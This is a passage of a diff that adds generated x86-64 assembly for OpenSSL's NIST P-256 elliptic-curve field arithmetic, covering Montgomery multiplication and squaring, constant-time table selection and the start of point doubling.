+	mulq	%rax
+	addq	%rcx,%r9
+	adcq	%rax,%r10
+	movq	16(%rsi),%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	%rax
+	addq	%rcx,%r11
+	adcq	%rax,%r12
+	movq	24(%rsi),%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	%rax
+	addq	%rcx,%r13
+	adcq	%rax,%r14
+	movq	%r8,%rax
+	adcq	%rdx,%r15
+
+	movq	.Lpoly+8(%rip),%rsi
+	movq	.Lpoly+24(%rip),%rbp
+
+
+
+
+	movq	%r8,%rcx
+	shlq	$32,%r8
+	mulq	%rbp
+	shrq	$32,%rcx
+	addq	%r8,%r9
+	adcq	%rcx,%r10
+	adcq	%rax,%r11
+	movq	%r9,%rax
+	adcq	$0,%rdx
+
+
+
+	movq	%r9,%rcx
+	shlq	$32,%r9
+	movq	%rdx,%r8
+	mulq	%rbp
+	shrq	$32,%rcx
+	addq	%r9,%r10
+	adcq	%rcx,%r11
+	adcq	%rax,%r8
+	movq	%r10,%rax
+	adcq	$0,%rdx
+
+
+
+	movq	%r10,%rcx
+	shlq	$32,%r10
+	movq	%rdx,%r9
+	mulq	%rbp
+	shrq	$32,%rcx
+	addq	%r10,%r11
+	adcq	%rcx,%r8
+	adcq	%rax,%r9
+	movq	%r11,%rax
+	adcq	$0,%rdx
+
+
+
+	movq	%r11,%rcx
+	shlq	$32,%r11
+	movq	%rdx,%r10
+	mulq	%rbp
+	shrq	$32,%rcx
+	addq	%r11,%r8
+	adcq	%rcx,%r9
+	adcq	%rax,%r10
+	adcq	$0,%rdx
+	xorq	%r11,%r11
+
+
+
+	addq	%r8,%r12
+	adcq	%r9,%r13
+	movq	%r12,%r8
+	adcq	%r10,%r14
+	adcq	%rdx,%r15
+	movq	%r13,%r9
+	adcq	$0,%r11
+
+	subq	$-1,%r12
+	movq	%r14,%r10
+	sbbq	%rsi,%r13
+	sbbq	$0,%r14
+	movq	%r15,%rcx
+	sbbq	%rbp,%r15
+	sbbq	$0,%r11
+
+	cmovcq	%r8,%r12
+	cmovcq	%r9,%r13
+	movq	%r12,0(%rdi)
+	cmovcq	%r10,%r14
+	movq	%r13,8(%rdi)
+	cmovcq	%rcx,%r15
+	movq	%r14,16(%rdi)
+	movq	%r15,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_sqr_montq,.-__ecp_nistz256_sqr_montq
+.type	__ecp_nistz256_mul_montx,@function
+.align	32
+__ecp_nistz256_mul_montx:
+
+
+	mulxq	%r9,%r8,%r9
+	mulxq	%r10,%rcx,%r10
+	movq	$32,%r14
+	xorq	%r13,%r13
+	mulxq	%r11,%rbp,%r11
+	movq	.Lpoly+24(%rip),%r15
+	adcq	%rcx,%r9
+	mulxq	%r12,%rcx,%r12
+	movq	%r8,%rdx
+	adcq	%rbp,%r10
+	shlxq	%r14,%r8,%rbp
+	adcq	%rcx,%r11
+	shrxq	%r14,%r8,%rcx
+	adcq	$0,%r12
+
+
+
+	addq	%rbp,%r9
+	adcq	%rcx,%r10
+
+	mulxq	%r15,%rcx,%rbp
+	movq	8(%rbx),%rdx
+	adcq	%rcx,%r11
+	adcq	%rbp,%r12
+	adcq	$0,%r13
+	xorq	%r8,%r8
+
+
+
+	mulxq	0+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r9
+	adoxq	%rbp,%r10
+
+	mulxq	8+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r10
+	adoxq	%rbp,%r11
+
+	mulxq	16+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r11
+	adoxq	%rbp,%r12
+
+	mulxq	24+128(%rsi),%rcx,%rbp
+	movq	%r9,%rdx
+	adcxq	%rcx,%r12
+	shlxq	%r14,%r9,%rcx
+	adoxq	%rbp,%r13
+	shrxq	%r14,%r9,%rbp
+
+	adcxq	%r8,%r13
+	adoxq	%r8,%r8
+	adcq	$0,%r8
+
+
+
+	addq	%rcx,%r10
+	adcq	%rbp,%r11
+
+	mulxq	%r15,%rcx,%rbp
+	movq	16(%rbx),%rdx
+	adcq	%rcx,%r12
+	adcq	%rbp,%r13
+	adcq	$0,%r8
+	xorq	%r9,%r9
+
+
+
+	mulxq	0+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r10
+	adoxq	%rbp,%r11
+
+	mulxq	8+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r11
+	adoxq	%rbp,%r12
+
+	mulxq	16+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r12
+	adoxq	%rbp,%r13
+
+	mulxq	24+128(%rsi),%rcx,%rbp
+	movq	%r10,%rdx
+	adcxq	%rcx,%r13
+	shlxq	%r14,%r10,%rcx
+	adoxq	%rbp,%r8
+	shrxq	%r14,%r10,%rbp
+
+	adcxq	%r9,%r8
+	adoxq	%r9,%r9
+	adcq	$0,%r9
+
+
+
+	addq	%rcx,%r11
+	adcq	%rbp,%r12
+
+	mulxq	%r15,%rcx,%rbp
+	movq	24(%rbx),%rdx
+	adcq	%rcx,%r13
+	adcq	%rbp,%r8
+	adcq	$0,%r9
+	xorq	%r10,%r10
+
+
+
+	mulxq	0+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r11
+	adoxq	%rbp,%r12
+
+	mulxq	8+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r12
+	adoxq	%rbp,%r13
+
+	mulxq	16+128(%rsi),%rcx,%rbp
+	adcxq	%rcx,%r13
+	adoxq	%rbp,%r8
+
+	mulxq	24+128(%rsi),%rcx,%rbp
+	movq	%r11,%rdx
+	adcxq	%rcx,%r8
+	shlxq	%r14,%r11,%rcx
+	adoxq	%rbp,%r9
+	shrxq	%r14,%r11,%rbp
+
+	adcxq	%r10,%r9
+	adoxq	%r10,%r10
+	adcq	$0,%r10
+
+
+
+	addq	%rcx,%r12
+	adcq	%rbp,%r13
+
+	mulxq	%r15,%rcx,%rbp
+	movq	%r12,%rbx
+	movq	.Lpoly+8(%rip),%r14
+	adcq	%rcx,%r8
+	movq	%r13,%rdx
+	adcq	%rbp,%r9
+	adcq	$0,%r10
+
+
+
+	xorl	%eax,%eax
+	movq	%r8,%rcx
+	sbbq	$-1,%r12
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%rbp
+	sbbq	%r15,%r9
+	sbbq	$0,%r10
+
+	cmovcq	%rbx,%r12
+	cmovcq	%rdx,%r13
+	movq	%r12,0(%rdi)
+	cmovcq	%rcx,%r8
+	movq	%r13,8(%rdi)
+	cmovcq	%rbp,%r9
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_mul_montx,.-__ecp_nistz256_mul_montx
+
+.type	__ecp_nistz256_sqr_montx,@function
+.align	32
+__ecp_nistz256_sqr_montx:
+	mulxq	%r14,%r9,%r10
+	mulxq	%r15,%rcx,%r11
+	xorl	%eax,%eax
+	adcq	%rcx,%r10
+	mulxq	%r8,%rbp,%r12
+	movq	%r14,%rdx
+	adcq	%rbp,%r11
+	adcq	$0,%r12
+	xorq	%r13,%r13
+
+
+	mulxq	%r15,%rcx,%rbp
+	adcxq	%rcx,%r11
+	adoxq	%rbp,%r12
+
+	mulxq	%r8,%rcx,%rbp
+	movq	%r15,%rdx
+	adcxq	%rcx,%r12
+	adoxq	%rbp,%r13
+	adcq	$0,%r13
+
+
+	mulxq	%r8,%rcx,%r14
+	movq	0+128(%rsi),%rdx
+	xorq	%r15,%r15
+	adcxq	%r9,%r9
+	adoxq	%rcx,%r13
+	adcxq	%r10,%r10
+	adoxq	%r15,%r14
+
+	mulxq	%rdx,%r8,%rbp
+	movq	8+128(%rsi),%rdx
+	adcxq	%r11,%r11
+	adoxq	%rbp,%r9
+	adcxq	%r12,%r12
+	mulxq	%rdx,%rcx,%rax
+	movq	16+128(%rsi),%rdx
+	adcxq	%r13,%r13
+	adoxq	%rcx,%r10
+	adcxq	%r14,%r14
+.byte	0x67
+	mulxq	%rdx,%rcx,%rbp
+	movq	24+128(%rsi),%rdx
+	adoxq	%rax,%r11
+	adcxq	%r15,%r15
+	adoxq	%rcx,%r12
+	movq	$32,%rsi
+	adoxq	%rbp,%r13
+.byte	0x67,0x67
+	mulxq	%rdx,%rcx,%rax
+	movq	%r8,%rdx
+	adoxq	%rcx,%r14
+	shlxq	%rsi,%r8,%rcx
+	adoxq	%rax,%r15
+	shrxq	%rsi,%r8,%rax
+	movq	.Lpoly+24(%rip),%rbp
+
+
+	addq	%rcx,%r9
+	adcq	%rax,%r10
+
+	mulxq	%rbp,%rcx,%r8
+	movq	%r9,%rdx
+	adcq	%rcx,%r11
+	shlxq	%rsi,%r9,%rcx
+	adcq	$0,%r8
+	shrxq	%rsi,%r9,%rax
+
+
+	addq	%rcx,%r10
+	adcq	%rax,%r11
+
+	mulxq	%rbp,%rcx,%r9
+	movq	%r10,%rdx
+	adcq	%rcx,%r8
+	shlxq	%rsi,%r10,%rcx
+	adcq	$0,%r9
+	shrxq	%rsi,%r10,%rax
+
+
+	addq	%rcx,%r11
+	adcq	%rax,%r8
+
+	mulxq	%rbp,%rcx,%r10
+	movq	%r11,%rdx
+	adcq	%rcx,%r9
+	shlxq	%rsi,%r11,%rcx
+	adcq	$0,%r10
+	shrxq	%rsi,%r11,%rax
+
+
+	addq	%rcx,%r8
+	adcq	%rax,%r9
+
+	mulxq	%rbp,%rcx,%r11
+	adcq	%rcx,%r10
+	adcq	$0,%r11
+
+	xorq	%rdx,%rdx
+	adcq	%r8,%r12
+	movq	.Lpoly+8(%rip),%rsi
+	adcq	%r9,%r13
+	movq	%r12,%r8
+	adcq	%r10,%r14
+	adcq	%r11,%r15
+	movq	%r13,%r9
+	adcq	$0,%rdx
+
+	xorl	%eax,%eax
+	sbbq	$-1,%r12
+	movq	%r14,%r10
+	sbbq	%rsi,%r13
+	sbbq	$0,%r14
+	movq	%r15,%r11
+	sbbq	%rbp,%r15
+	sbbq	$0,%rdx
+
+	cmovcq	%r8,%r12
+	cmovcq	%r9,%r13
+	movq	%r12,0(%rdi)
+	cmovcq	%r10,%r14
+	movq	%r13,8(%rdi)
+	cmovcq	%r11,%r15
+	movq	%r14,16(%rdi)
+	movq	%r15,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_sqr_montx,.-__ecp_nistz256_sqr_montx
+
+
+
+
+
+
+.globl	ecp_nistz256_from_mont
+.type	ecp_nistz256_from_mont,@function
+.align	32
+ecp_nistz256_from_mont:
+	pushq	%r12
+	pushq	%r13
+
+	movq	0(%rsi),%rax
+	movq	.Lpoly+24(%rip),%r13
+	movq	8(%rsi),%r9
+	movq	16(%rsi),%r10
+	movq	24(%rsi),%r11
+	movq	%rax,%r8
+	movq	.Lpoly+8(%rip),%r12
+
+
+
+	movq	%rax,%rcx
+	shlq	$32,%r8
+	mulq	%r13
+	shrq	$32,%rcx
+	addq	%r8,%r9
+	adcq	%rcx,%r10
+	adcq	%rax,%r11
+	movq	%r9,%rax
+	adcq	$0,%rdx
+
+
+
+	movq	%r9,%rcx
+	shlq	$32,%r9
+	movq	%rdx,%r8
+	mulq	%r13
+	shrq	$32,%rcx
+	addq	%r9,%r10
+	adcq	%rcx,%r11
+	adcq	%rax,%r8
+	movq	%r10,%rax
+	adcq	$0,%rdx
+
+
+
+	movq	%r10,%rcx
+	shlq	$32,%r10
+	movq	%rdx,%r9
+	mulq	%r13
+	shrq	$32,%rcx
+	addq	%r10,%r11
+	adcq	%rcx,%r8
+	adcq	%rax,%r9
+	movq	%r11,%rax
+	adcq	$0,%rdx
+
+
+
+	movq	%r11,%rcx
+	shlq	$32,%r11
+	movq	%rdx,%r10
+	mulq	%r13
+	shrq	$32,%rcx
+	addq	%r11,%r8
+	adcq	%rcx,%r9
+	movq	%r8,%rcx
+	adcq	%rax,%r10
+	movq	%r9,%rsi
+	adcq	$0,%rdx
+
+
+
+	subq	$-1,%r8
+	movq	%r10,%rax
+	sbbq	%r12,%r9
+	sbbq	$0,%r10
+	movq	%rdx,%r11
+	sbbq	%r13,%rdx
+	sbbq	%r13,%r13
+
+	cmovnzq	%rcx,%r8
+	cmovnzq	%rsi,%r9
+	movq	%r8,0(%rdi)
+	cmovnzq	%rax,%r10
+	movq	%r9,8(%rdi)
+	cmovzq	%rdx,%r11
+	movq	%r10,16(%rdi)
+	movq	%r11,24(%rdi)
+
+	popq	%r13
+	popq	%r12
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_from_mont,.-ecp_nistz256_from_mont
+
+
+.globl	ecp_nistz256_select_w5
+.type	ecp_nistz256_select_w5,@function
+.align	32
+ecp_nistz256_select_w5:
+	movl	OPENSSL_ia32cap_P+8(%rip),%eax
+	testl	$32,%eax
+	jnz	.Lavx2_select_w5
+	movdqa	.LOne(%rip),%xmm0
+	movd	%edx,%xmm1
+
+	pxor	%xmm2,%xmm2
+	pxor	%xmm3,%xmm3
+	pxor	%xmm4,%xmm4
+	pxor	%xmm5,%xmm5
+	pxor	%xmm6,%xmm6
+	pxor	%xmm7,%xmm7
+
+	movdqa	%xmm0,%xmm8
+	pshufd	$0,%xmm1,%xmm1
+
+	movq	$16,%rax
+.Lselect_loop_sse_w5:
+
+	movdqa	%xmm8,%xmm15
+	paddd	%xmm0,%xmm8
+	pcmpeqd	%xmm1,%xmm15
+
+	movdqa	0(%rsi),%xmm9
+	movdqa	16(%rsi),%xmm10
+	movdqa	32(%rsi),%xmm11
+	movdqa	48(%rsi),%xmm12
+	movdqa	64(%rsi),%xmm13
+	movdqa	80(%rsi),%xmm14
+	leaq	96(%rsi),%rsi
+
+	pand	%xmm15,%xmm9
+	pand	%xmm15,%xmm10
+	por	%xmm9,%xmm2
+	pand	%xmm15,%xmm11
+	por	%xmm10,%xmm3
+	pand	%xmm15,%xmm12
+	por	%xmm11,%xmm4
+	pand	%xmm15,%xmm13
+	por	%xmm12,%xmm5
+	pand	%xmm15,%xmm14
+	por	%xmm13,%xmm6
+	por	%xmm14,%xmm7
+
+	decq	%rax
+	jnz	.Lselect_loop_sse_w5
+
+	movdqu	%xmm2,0(%rdi)
+	movdqu	%xmm3,16(%rdi)
+	movdqu	%xmm4,32(%rdi)
+	movdqu	%xmm5,48(%rdi)
+	movdqu	%xmm6,64(%rdi)
+	movdqu	%xmm7,80(%rdi)
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_select_w5,.-ecp_nistz256_select_w5
+
+
+
+.globl	ecp_nistz256_select_w7
+.type	ecp_nistz256_select_w7,@function
+.align	32
+ecp_nistz256_select_w7:
+	movl	OPENSSL_ia32cap_P+8(%rip),%eax
+	testl	$32,%eax
+	jnz	.Lavx2_select_w7
+	movdqa	.LOne(%rip),%xmm8
+	movd	%edx,%xmm1
+
+	pxor	%xmm2,%xmm2
+	pxor	%xmm3,%xmm3
+	pxor	%xmm4,%xmm4
+	pxor	%xmm5,%xmm5
+
+	movdqa	%xmm8,%xmm0
+	pshufd	$0,%xmm1,%xmm1
+	movq	$64,%rax
+
+.Lselect_loop_sse_w7:
+	movdqa	%xmm8,%xmm15
+	paddd	%xmm0,%xmm8
+	movdqa	0(%rsi),%xmm9
+	movdqa	16(%rsi),%xmm10
+	pcmpeqd	%xmm1,%xmm15
+	movdqa	32(%rsi),%xmm11
+	movdqa	48(%rsi),%xmm12
+	leaq	64(%rsi),%rsi
+
+	pand	%xmm15,%xmm9
+	pand	%xmm15,%xmm10
+	por	%xmm9,%xmm2
+	pand	%xmm15,%xmm11
+	por	%xmm10,%xmm3
+	pand	%xmm15,%xmm12
+	por	%xmm11,%xmm4
+	prefetcht0	255(%rsi)
+	por	%xmm12,%xmm5
+
+	decq	%rax
+	jnz	.Lselect_loop_sse_w7
+
+	movdqu	%xmm2,0(%rdi)
+	movdqu	%xmm3,16(%rdi)
+	movdqu	%xmm4,32(%rdi)
+	movdqu	%xmm5,48(%rdi)
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_select_w7,.-ecp_nistz256_select_w7
+
+
+.type	ecp_nistz256_avx2_select_w5,@function
+.align	32
+ecp_nistz256_avx2_select_w5:
+.Lavx2_select_w5:
+	vzeroupper
+	vmovdqa	.LTwo(%rip),%ymm0
+
+	vpxor	%ymm2,%ymm2,%ymm2
+	vpxor	%ymm3,%ymm3,%ymm3
+	vpxor	%ymm4,%ymm4,%ymm4
+
+	vmovdqa	.LOne(%rip),%ymm5
+	vmovdqa	.LTwo(%rip),%ymm10
+
+	vmovd	%edx,%xmm1
+	vpermd	%ymm1,%ymm2,%ymm1
+
+	movq	$8,%rax
+.Lselect_loop_avx2_w5:
+
+	vmovdqa	0(%rsi),%ymm6
+	vmovdqa	32(%rsi),%ymm7
+	vmovdqa	64(%rsi),%ymm8
+
+	vmovdqa	96(%rsi),%ymm11
+	vmovdqa	128(%rsi),%ymm12
+	vmovdqa	160(%rsi),%ymm13
+
+	vpcmpeqd	%ymm1,%ymm5,%ymm9
+	vpcmpeqd	%ymm1,%ymm10,%ymm14
+
+	vpaddd	%ymm0,%ymm5,%ymm5
+	vpaddd	%ymm0,%ymm10,%ymm10
+	leaq	192(%rsi),%rsi
+
+	vpand	%ymm9,%ymm6,%ymm6
+	vpand	%ymm9,%ymm7,%ymm7
+	vpand	%ymm9,%ymm8,%ymm8
+	vpand	%ymm14,%ymm11,%ymm11
+	vpand	%ymm14,%ymm12,%ymm12
+	vpand	%ymm14,%ymm13,%ymm13
+
+	vpxor	%ymm6,%ymm2,%ymm2
+	vpxor	%ymm7,%ymm3,%ymm3
+	vpxor	%ymm8,%ymm4,%ymm4
+	vpxor	%ymm11,%ymm2,%ymm2
+	vpxor	%ymm12,%ymm3,%ymm3
+	vpxor	%ymm13,%ymm4,%ymm4
+
+	decq	%rax
+	jnz	.Lselect_loop_avx2_w5
+
+	vmovdqu	%ymm2,0(%rdi)
+	vmovdqu	%ymm3,32(%rdi)
+	vmovdqu	%ymm4,64(%rdi)
+	vzeroupper
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_avx2_select_w5,.-ecp_nistz256_avx2_select_w5
+
+
+
+.globl	ecp_nistz256_avx2_select_w7
+.type	ecp_nistz256_avx2_select_w7,@function
+.align	32
+ecp_nistz256_avx2_select_w7:
+.Lavx2_select_w7:
+	vzeroupper
+	vmovdqa	.LThree(%rip),%ymm0
+
+	vpxor	%ymm2,%ymm2,%ymm2
+	vpxor	%ymm3,%ymm3,%ymm3
+
+	vmovdqa	.LOne(%rip),%ymm4
+	vmovdqa	.LTwo(%rip),%ymm8
+	vmovdqa	.LThree(%rip),%ymm12
+
+	vmovd	%edx,%xmm1
+	vpermd	%ymm1,%ymm2,%ymm1
+
+
+	movq	$21,%rax
+.Lselect_loop_avx2_w7:
+
+	vmovdqa	0(%rsi),%ymm5
+	vmovdqa	32(%rsi),%ymm6
+
+	vmovdqa	64(%rsi),%ymm9
+	vmovdqa	96(%rsi),%ymm10
+
+	vmovdqa	128(%rsi),%ymm13
+	vmovdqa	160(%rsi),%ymm14
+
+	vpcmpeqd	%ymm1,%ymm4,%ymm7
+	vpcmpeqd	%ymm1,%ymm8,%ymm11
+	vpcmpeqd	%ymm1,%ymm12,%ymm15
+
+	vpaddd	%ymm0,%ymm4,%ymm4
+	vpaddd	%ymm0,%ymm8,%ymm8
+	vpaddd	%ymm0,%ymm12,%ymm12
+	leaq	192(%rsi),%rsi
+
+	vpand	%ymm7,%ymm5,%ymm5
+	vpand	%ymm7,%ymm6,%ymm6
+	vpand	%ymm11,%ymm9,%ymm9
+	vpand	%ymm11,%ymm10,%ymm10
+	vpand	%ymm15,%ymm13,%ymm13
+	vpand	%ymm15,%ymm14,%ymm14
+
+	vpxor	%ymm5,%ymm2,%ymm2
+	vpxor	%ymm6,%ymm3,%ymm3
+	vpxor	%ymm9,%ymm2,%ymm2
+	vpxor	%ymm10,%ymm3,%ymm3
+	vpxor	%ymm13,%ymm2,%ymm2
+	vpxor	%ymm14,%ymm3,%ymm3
+
+	decq	%rax
+	jnz	.Lselect_loop_avx2_w7
+
+
+	vmovdqa	0(%rsi),%ymm5
+	vmovdqa	32(%rsi),%ymm6
+
+	vpcmpeqd	%ymm1,%ymm4,%ymm7
+
+	vpand	%ymm7,%ymm5,%ymm5
+	vpand	%ymm7,%ymm6,%ymm6
+
+	vpxor	%ymm5,%ymm2,%ymm2
+	vpxor	%ymm6,%ymm3,%ymm3
+
+	vmovdqu	%ymm2,0(%rdi)
+	vmovdqu	%ymm3,32(%rdi)
+	vzeroupper
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_avx2_select_w7,.-ecp_nistz256_avx2_select_w7
+.type	__ecp_nistz256_add_toq,@function
+.align	32
+__ecp_nistz256_add_toq:
+	addq	0(%rbx),%r12
+	adcq	8(%rbx),%r13
+	movq	%r12,%rax
+	adcq	16(%rbx),%r8
+	adcq	24(%rbx),%r9
+	movq	%r13,%rbp
+	sbbq	%r11,%r11
+
+	subq	$-1,%r12
+	movq	%r8,%rcx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%r10
+	sbbq	%r15,%r9
+	testq	%r11,%r11
+
+	cmovzq	%rax,%r12
+	cmovzq	%rbp,%r13
+	movq	%r12,0(%rdi)
+	cmovzq	%rcx,%r8
+	movq	%r13,8(%rdi)
+	cmovzq	%r10,%r9
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_add_toq,.-__ecp_nistz256_add_toq
+
+.type	__ecp_nistz256_sub_fromq,@function
+.align	32
+__ecp_nistz256_sub_fromq:
+	subq	0(%rbx),%r12
+	sbbq	8(%rbx),%r13
+	movq	%r12,%rax
+	sbbq	16(%rbx),%r8
+	sbbq	24(%rbx),%r9
+	movq	%r13,%rbp
+	sbbq	%r11,%r11
+
+	addq	$-1,%r12
+	movq	%r8,%rcx
+	adcq	%r14,%r13
+	adcq	$0,%r8
+	movq	%r9,%r10
+	adcq	%r15,%r9
+	testq	%r11,%r11
+
+	cmovzq	%rax,%r12
+	cmovzq	%rbp,%r13
+	movq	%r12,0(%rdi)
+	cmovzq	%rcx,%r8
+	movq	%r13,8(%rdi)
+	cmovzq	%r10,%r9
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_sub_fromq,.-__ecp_nistz256_sub_fromq
+
+.type	__ecp_nistz256_subq,@function
+.align	32
+__ecp_nistz256_subq:
+	subq	%r12,%rax
+	sbbq	%r13,%rbp
+	movq	%rax,%r12
+	sbbq	%r8,%rcx
+	sbbq	%r9,%r10
+	movq	%rbp,%r13
+	sbbq	%r11,%r11
+
+	addq	$-1,%rax
+	movq	%rcx,%r8
+	adcq	%r14,%rbp
+	adcq	$0,%rcx
+	movq	%r10,%r9
+	adcq	%r15,%r10
+	testq	%r11,%r11
+
+	cmovnzq	%rax,%r12
+	cmovnzq	%rbp,%r13
+	cmovnzq	%rcx,%r8
+	cmovnzq	%r10,%r9
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_subq,.-__ecp_nistz256_subq
+
+.type	__ecp_nistz256_mul_by_2q,@function
+.align	32
+__ecp_nistz256_mul_by_2q:
+	addq	%r12,%r12
+	adcq	%r13,%r13
+	movq	%r12,%rax
+	adcq	%r8,%r8
+	adcq	%r9,%r9
+	movq	%r13,%rbp
+	sbbq	%r11,%r11
+
+	subq	$-1,%r12
+	movq	%r8,%rcx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%r10
+	sbbq	%r15,%r9
+	testq	%r11,%r11
+
+	cmovzq	%rax,%r12
+	cmovzq	%rbp,%r13
+	movq	%r12,0(%rdi)
+	cmovzq	%rcx,%r8
+	movq	%r13,8(%rdi)
+	cmovzq	%r10,%r9
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_mul_by_2q,.-__ecp_nistz256_mul_by_2q
+.globl	ecp_nistz256_point_double
+.type	ecp_nistz256_point_double,@function
+.align	32
+ecp_nistz256_point_double:
+	movl	$524544,%ecx
+	andl	OPENSSL_ia32cap_P+8(%rip),%ecx
+	cmpl	$524544,%ecx
+	je	.Lpoint_doublex
+	pushq	%rbp
+	pushq	%rbx
+	pushq	%r12
+	pushq	%r13
+	pushq	%r14
+	pushq	%r15
+	subq	$160+8,%rsp
+
+	movdqu	0(%rsi),%xmm0
+	movq	%rsi,%rbx
+	movdqu	16(%rsi),%xmm1
+	movq	32+0(%rsi),%r12
+	movq	32+8(%rsi),%r13
+	movq	32+16(%rsi),%r8
+	movq	32+24(%rsi),%r9
+	movq	.Lpoly+8(%rip),%r14
+	movq	.Lpoly+24(%rip),%r15
+	movdqa	%xmm0,96(%rsp)
+	movdqa	%xmm1,96+16(%rsp)
+	leaq	32(%rdi),%r10
+	leaq	64(%rdi),%r11
+.byte	102,72,15,110,199
+.byte	102,73,15,110,202
+.byte	102,73,15,110,211
+
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_by_2q
+
+	movq	64+0(%rsi),%rax
+	movq	64+8(%rsi),%r14
+	movq	64+16(%rsi),%r15
+	movq	64+24(%rsi),%r8
+	leaq	64-0(%rsi),%rsi
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	movq	0+0(%rsp),%rax
+	movq	8+0(%rsp),%r14
+	leaq	0+0(%rsp),%rsi
+	movq	16+0(%rsp),%r15
+	movq	24+0(%rsp),%r8
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	movq	32(%rbx),%rax
+	movq	64+0(%rbx),%r9
+	movq	64+8(%rbx),%r10
+	movq	64+16(%rbx),%r11
+	movq	64+24(%rbx),%r12
+	leaq	64-0(%rbx),%rsi
+	leaq	32(%rbx),%rbx
+.byte	102,72,15,126,215
+	call	__ecp_nistz256_mul_montq
+	call	__ecp_nistz256_mul_by_2q
+
+	movq	96+0(%rsp),%r12
+	movq	96+8(%rsp),%r13
+	leaq	64(%rsp),%rbx
+	movq	96+16(%rsp),%r8
+	movq	96+24(%rsp),%r9
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_add_toq
+
+	movq	96+0(%rsp),%r12
+	movq	96+8(%rsp),%r13
+	leaq	64(%rsp),%rbx
+	movq	96+16(%rsp),%r8
+	movq	96+24(%rsp),%r9
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+	movq	0+0(%rsp),%rax
+	movq	8+0(%rsp),%r14
+	leaq	0+0(%rsp),%rsi
+	movq	16+0(%rsp),%r15
+	movq	24+0(%rsp),%r8
+.byte	102,72,15,126,207
+	call	__ecp_nistz256_sqr_montq
+	xorq	%r9,%r9
+	movq	%r12,%rax
+	addq	$-1,%r12
+	movq	%r13,%r10
+	adcq	%rsi,%r13
+	movq	%r14,%rcx
+	adcq	$0,%r14
+	movq	%r15,%r8
+	adcq	%rbp,%r15
+	adcq	$0,%r9
+	xorq	%rsi,%rsi
+	testq	$1,%rax
+
+	cmovzq	%rax,%r12
+	cmovzq	%r10,%r13
+	cmovzq	%rcx,%r14
+	cmovzq	%r8,%r15
+	cmovzq	%rsi,%r9
+
+	movq	%r13,%rax
+	shrq	$1,%r12
+	shlq	$63,%rax
+	movq	%r14,%r10
+	shrq	$1,%r13
+	orq	%rax,%r12
+	shlq	$63,%r10
+	movq	%r15,%rcx
+	shrq	$1,%r14
+	orq	%r10,%r13
+	shlq	$63,%rcx
+	movq	%r12,0(%rdi)
+	shrq	$1,%r15
+	movq	%r13,8(%rdi)
+	shlq	$63,%r9
+	orq	%rcx,%r14
+	orq	%r9,%r15
+	movq	%r14,16(%rdi)
+	movq	%r15,24(%rdi)
+	movq	64(%rsp),%rax
+	leaq	64(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	0+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	leaq	128(%rsp),%rdi
+	call	__ecp_nistz256_mul_by_2q
+
+	leaq	32(%rsp),%rbx
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_add_toq
+
+	movq	96(%rsp),%rax
+	leaq	96(%rsp),%rbx
+	movq	0+0(%rsp),%r9
+	movq	8+0(%rsp),%r10
+	leaq	0+0(%rsp),%rsi
+	movq	16+0(%rsp),%r11
+	movq	24+0(%rsp),%r12
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	leaq	128(%rsp),%rdi
+	call	__ecp_nistz256_mul_by_2q
+
+	movq	0+32(%rsp),%rax
+	movq	8+32(%rsp),%r14
+	leaq	0+32(%rsp),%rsi
+	movq	16+32(%rsp),%r15
+	movq	24+32(%rsp),%r8
+.byte	102,72,15,126,199
+	call	__ecp_nistz256_sqr_montq
+
+	leaq	128(%rsp),%rbx
+	movq	%r14,%r8
+	movq	%r15,%r9
+	movq	%rsi,%r14
+	movq	%rbp,%r15
+	call	__ecp_nistz256_sub_fromq
+
+	movq	0+0(%rsp),%rax
+	movq	0+8(%rsp),%rbp
+	movq	0+16(%rsp),%rcx
+	movq	0+24(%rsp),%r10
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_subq
+
+	movq	32(%rsp),%rax
+	leaq	32(%rsp),%rbx
+	movq	%r12,%r14
+	xorl	%ecx,%ecx
+	movq	%r12,0+0(%rsp)
+	movq	%r13,%r10
+	movq	%r13,0+8(%rsp)
+	cmovzq	%r8,%r11
+	movq	%r8,0+16(%rsp)
